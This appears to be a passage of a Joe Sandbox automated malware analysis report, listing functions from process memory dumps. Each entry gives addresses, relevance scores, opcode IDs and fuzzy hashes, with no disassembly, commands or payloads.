                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f20000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction ID: 26f9196406735b8252ef0e5b33a1d5fc69642307707be3e3b7f04e1aa36bc3c3
                                                                  • Opcode Fuzzy Hash: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction Fuzzy Hash: 19F03935D0C11A4FF7A4A394E4513AA73A0EB84350F1400B9D90EA37C2DE3CAE818B1D
                                                                  Function 00007FF848F579B9 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: afe58893e434721fec05e7b60ee18612c041b28cbf4db1a1d9207a3ffaad93e7
                                                                  • Instruction ID: 2d82e6ab5ae050a02a849ba86f7ba7ab76a3dd9b92f1608a7a2ce01a11a35e26
                                                                  • Opcode Fuzzy Hash: afe58893e434721fec05e7b60ee18612c041b28cbf4db1a1d9207a3ffaad93e7
                                                                  • Instruction Fuzzy Hash: AAE0BF21A497844FC70A663488658543BB1DF6725174A41D7D045CF6B3D61DDC4DC751
                                                                  Function 00007FF848F5A610 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                  Function 00007FF848F5DA99 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: abf1fe238e975699977a4e2cad7575a76beb606b1b00fcc38e74fb71d2e235d9
                                                                  • Instruction ID: 161374e98680603957dd366a0cbc6b48fb407d9404acf937829b029061d06991
                                                                  • Opcode Fuzzy Hash: abf1fe238e975699977a4e2cad7575a76beb606b1b00fcc38e74fb71d2e235d9
                                                                  • Instruction Fuzzy Hash: 90E01A7294E7C44FC70BAB3488A99557F70EE2721074A41EEC046CF1A3E62A9C49CB01
                                                                  Function 00007FF848F5A580 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                  Function 00007FF848F38868 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f30000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction ID: c3d5f0c3198227523331ad8b3b44ad54c92322ec2f537f06ba6572fb567ad846
                                                                  • Opcode Fuzzy Hash: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction Fuzzy Hash: 2AE09A32D4C1068FF700BB90C404AE872049F513A4F0942B68C4DAB2D3DF6DA9448BC9
                                                                  Function 00007FF848F5DA19 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 395c36017857d5c67762ab51698be36c77681ec197be9d7e0c652805ffdc24d9
                                                                  • Instruction ID: c9df1cc871401263db8b671480a7aa98828ddc858479813febaa36bf89a52b07
                                                                  • Opcode Fuzzy Hash: 395c36017857d5c67762ab51698be36c77681ec197be9d7e0c652805ffdc24d9
                                                                  • Instruction Fuzzy Hash: EBE01A3194E7C08FC70B973588698507F60DE2721074A44EEC185CF1A3DA198849C701
                                                                  Function 00007FF848F523C0 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                  Function 00007FF848F5B890 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction ID: 5247c4fdf6c0c826e2f7bf4434eaeaa0ffef6e36569f441342f6b298eb676434
                                                                  • Opcode Fuzzy Hash: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction Fuzzy Hash: 29D01234B659044FCB0CBB3888598747391EB6A216B9540B9D00BC72B2DA6ADC89C741
                                                                  Function 00007FF848F56F70 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction ID: fe0ba6b06ba2acf9f48637e8285095f17b0ed6dfac4f70930b7f3cbdacc3bde4
                                                                  • Opcode Fuzzy Hash: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction Fuzzy Hash: F6D01234B54D044FC70CB73CC8598747391EB6A216BD540A9D00AC72B2DA6ADC89C741
                                                                  Function 00007FF848F34244 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f30000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b62d680c3bd7c63559369bb27948dfe337c6880f70c1c48fc5b1d7214f655326
                                                                  • Instruction ID: cb10ae3ec84426a4cb9989ea39ad0e369b4c10fd0577b5ee4103e0220e6985ee
                                                                  • Opcode Fuzzy Hash: b62d680c3bd7c63559369bb27948dfe337c6880f70c1c48fc5b1d7214f655326
                                                                  • Instruction Fuzzy Hash: 37D01270D1E64E9EE741EB64C0526BEBEB0EF10380F400076D109922D7DE3C25418B8C
                                                                  Function 00007FF848F206A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f20000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction ID: 7b6de91a4ad0a58b62b15505831059e939ba8390a7cc6308592e73ccdb3e3da7
                                                                  • Opcode Fuzzy Hash: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction Fuzzy Hash: AEC04C26D5F51B59F415B36E74460ADB9406BD5790FD50172DD0D405C1AE4F20D5029E
                                                                  Function 00007FF848F212B0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f20000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction ID: 113e2643307379907782fd90d788077e2b902a7d0610b81c7d7edf45b456fd57
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 71C04C345558098FC948FB29D88591477A0FB19215BD60090E409CB1B1D65ADCD5C745
                                                                  Function 00007FF848F20B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f20000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 9949d6ecbbfdb685cf99504ec335c7d90d2898a58c5e8b0c8d697910e07bfc36
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: FDC08C304108088FC900F72CC89480072A0FB0D210BD10090E00DCB2B0E31A9C80C700
                                                                  Function 00007FF848F25E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f20000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 732cab8ac11e96fb612fd1b9718aed42b17c8816634d730c5f80797b371afd1d
                                                                  • Instruction ID: 242c2d742e59cd05345272d4a795ecc82a599ba7f3ac578fb6399f79eb3f0c57
                                                                  • Opcode Fuzzy Hash: 732cab8ac11e96fb612fd1b9718aed42b17c8816634d730c5f80797b371afd1d
                                                                  • Instruction Fuzzy Hash: 0AC04C15E2B81A9AF266631450216BE58579F84748F941075E40E973CACF4D6B41428F
                                                                  Function 00007FF848F206C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f20000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: b1a946f32eae564092c0f3c60d0834f421d52b35b87ca455c30be94ef4ed59ee
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 99B00215C6E44F45E454337A294616574506B85254FD51170DC0D505C5994F15D5139A

                                                                  Executed Functions

                                                                  Function 00007FF848F50EF0 Relevance: 2.8, Strings: 1, Instructions: 1520COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f50000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3<K_^
                                                                  • API String ID: 0-3740798272
                                                                  • Opcode ID: 9e2ed0222f7059322cb2c10d3d3a4dfd879d554dd4c5c7aadb3b4c5ff795f714
                                                                  • Instruction ID: ace4d70555c7ec412c5f3089afab6fc2c27d70b9c2ee5d76d03719c815a08a67
                                                                  • Opcode Fuzzy Hash: 9e2ed0222f7059322cb2c10d3d3a4dfd879d554dd4c5c7aadb3b4c5ff795f714
                                                                  • Instruction Fuzzy Hash: 20B28131E1C91A5FEA99FB2884916B5B3A2FF94754F1442B9D00DD32C7DE38BC828785
                                                                  Function 00007FF848F40D4C Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f40000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5X_H
                                                                  • API String ID: 0-3241812158
                                                                  • Opcode ID: dd0ad842e77504389b470b3fa569f5fbc29ea08d5b32c6a2bde2da856fe3c120
                                                                  • Instruction ID: d0ea1d9758e0375b93d3121c9f95437aa554daa45774b0939412602dacd57a1c
                                                                  • Opcode Fuzzy Hash: dd0ad842e77504389b470b3fa569f5fbc29ea08d5b32c6a2bde2da856fe3c120
                                                                  • Instruction Fuzzy Hash: E591E2B1D1DA998FE78AEB6888697A97FE1FBA5350F0000BBC009D72D2CF791414C755
                                                                  Function 00007FF848F40B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f40000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: fa33613465739c384d0fcea7d75dc7e00d25afd541c4208485bd3048da13d746
                                                                  • Instruction ID: 5cd7a5f1d2fcd0e75ef7862164ff14545f4eea2bb7a947d71b3b477837ff8f63
                                                                  • Opcode Fuzzy Hash: fa33613465739c384d0fcea7d75dc7e00d25afd541c4208485bd3048da13d746
                                                                  • Instruction Fuzzy Hash: 19F04437B299464BC7427B3DFC914F8BB40EAA7276BA502BBD084C71A2E252145EC3D1
                                                                  Function 00007FF848F73A9D Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @aH$M
                                                                  • API String ID: 0-2096102131
                                                                  • Opcode ID: 61e9aaeafa30892a3a2604d0e30d168bf4b1e29704939618f0a9340f739480a5
                                                                  • Instruction ID: 863c2891a748541aa06a92bdece42515cbd8293c90e904da324fe8bb5d75142b
                                                                  • Opcode Fuzzy Hash: 61e9aaeafa30892a3a2604d0e30d168bf4b1e29704939618f0a9340f739480a5
                                                                  • Instruction Fuzzy Hash: 47719E32E1CD9A6FF658FB6C8466674B2D1EF55390F8401B9C40EC71C3DE2D6C858249
                                                                  Function 00007FF848F72268 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 9f943e6c62cad2ee1f2c8d923c6fbc7c779f792feba98902f3aa9930f0416ed6
                                                                  • Instruction ID: dc841e223b813023c2bdf8650834f5ef0c4507d0a9abf9ab63da686f25d176bf
                                                                  • Opcode Fuzzy Hash: 9f943e6c62cad2ee1f2c8d923c6fbc7c779f792feba98902f3aa9930f0416ed6
                                                                  • Instruction Fuzzy Hash: FD119D3184E7C14FEB07A73488689A57FA0AF53355B0D81EED096CF0E3DA29984AC712
                                                                  Function 00007FF848F7A569 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 31fef4a0c0d83ff359a987daffcdde5e2409cd8f2db02ccac0cb415b9ecfa7f3
                                                                  • Instruction ID: 119ecb57dbcbdabd2f90b418a5663ab51598a31707f5ba871b85662a952e734c
                                                                  • Opcode Fuzzy Hash: 31fef4a0c0d83ff359a987daffcdde5e2409cd8f2db02ccac0cb415b9ecfa7f3
                                                                  • Instruction Fuzzy Hash: 54E06571A0E7C44FD719EB3444594547F60EF6720174A41EEC045CB1A7EA1DC885C701
                                                                  Function 00007FF848F73609 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 85ff33bac9d62da52ee23492b0f0eb850790c53a70d9ca8cd66a05b7c37b0c0e
                                                                  • Instruction ID: bdaf03378f6867f9d6b458cc97032262832ca39a46386d951aacd3f04495e242
                                                                  • Opcode Fuzzy Hash: 85ff33bac9d62da52ee23492b0f0eb850790c53a70d9ca8cd66a05b7c37b0c0e
                                                                  • Instruction Fuzzy Hash: 47F0307150E7C44FD71AEB348869855BF60EF6720174A52EEC045CF2A7EA299885C701
                                                                  Function 00007FF848F72319 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 784df6bb27288454d967347caf6e7660e19de90b7eb030ffe7e31fba95cb6291
                                                                  • Instruction ID: b765431cba1ad8d547f1983931f8d69c4e43f88fc49d2ac1f2a3ca3e3c3803a9
                                                                  • Opcode Fuzzy Hash: 784df6bb27288454d967347caf6e7660e19de90b7eb030ffe7e31fba95cb6291
                                                                  • Instruction Fuzzy Hash: 6EF0657190E7C44FC716EB748869855BFA0EF6720174941EEC046CF2A7EA2D9885C701
                                                                  Function 00007FF848F7A5F9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: d5db2c7f89cb3a112d9ba7801e57a715d8dac74a7889ab5ab43d43d7ee28ee35
                                                                  • Instruction ID: 948753a4d314b5a503bccabde2678e58e45616beee9c005f5f1146b53150ae7d
                                                                  • Opcode Fuzzy Hash: d5db2c7f89cb3a112d9ba7801e57a715d8dac74a7889ab5ab43d43d7ee28ee35
                                                                  • Instruction Fuzzy Hash: 93E06D71A0E7C44FD71AAA34886D855BFA0EF6721174A52EFC045CF1A7EA2DC889C701
                                                                  Function 00007FF848F7AB39 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 426ba80f48ed913561b92a1f4a3e79a426186dbba0df4f2b5b64632bd88b7a0b
                                                                  • Instruction ID: 9eb3e01f69d41c55cd9caaa731e159d7f7289ddff695c75fe8c149c531ddf38a
                                                                  • Opcode Fuzzy Hash: 426ba80f48ed913561b92a1f4a3e79a426186dbba0df4f2b5b64632bd88b7a0b
                                                                  • Instruction Fuzzy Hash: 19E01A7184E7C04FCB4AEB3488698547FA0EF67211B8B40EEC189CB1A3E62D984AC701
                                                                  Function 00007FF848F723A9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 0cd558e4a3d5cad7f538695863c73bc77b77692d7485b6f80463bbf882670850
                                                                  • Instruction ID: d7c461d5ef1ba430cb90f9742133ac5c4e985fb01e65d66cb4a1dc45583d823c
                                                                  • Opcode Fuzzy Hash: 0cd558e4a3d5cad7f538695863c73bc77b77692d7485b6f80463bbf882670850
                                                                  • Instruction Fuzzy Hash: CAE0127144E7D08FCB5AEB7488659543FB0EE6721174A50DED045CF1F7E62D9849C701
                                                                  Function 00007FF848F77E49 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f71000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 5794caf117f1489419208c6f8d32f74619d5494f620cb761111b7db5ef44e9b7
                                                                  • Instruction ID: b02f057b5557104b4791abd7ba39390343c4fb1773436f89f697a1c8e47aed48
                                                                  • Opcode Fuzzy Hash: 5794caf117f1489419208c6f8d32f74619d5494f620cb761111b7db5ef44e9b7
                                                                  • Instruction Fuzzy Hash: AEE0ED7144E7C44FC706EB74886A9557FA0AE6721074A40EEC046CF1A3E62E9845C701
                                                                  Function 00007FF848F514FD Relevance: .4, Instructions: 445COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_32_2_7ff848f50000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d00397921119bf7ad458f516081377f7bda1b6ca3b92b7dd044903dbb2c047d
                                                                  • Instruction ID: 3759c718615f73942b2dbbb96711b4bd0d7aeaeb85ddb672f99586da09751a14
                                                                  • Opcode Fuzzy Hash: 3d00397921119bf7ad458f516081377f7bda1b6ca3b92b7dd044903dbb2c047d
                                                                  • Instruction Fuzzy Hash: 06E18031E1C95A9FEB59FB289491675B7A1FF98744F0401B9D00ED32C7DE28BC828789
                                                                  Function 00007FF848F79078 Relevance: .1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000020.00000002.2254027476.00007FF848F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F71000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
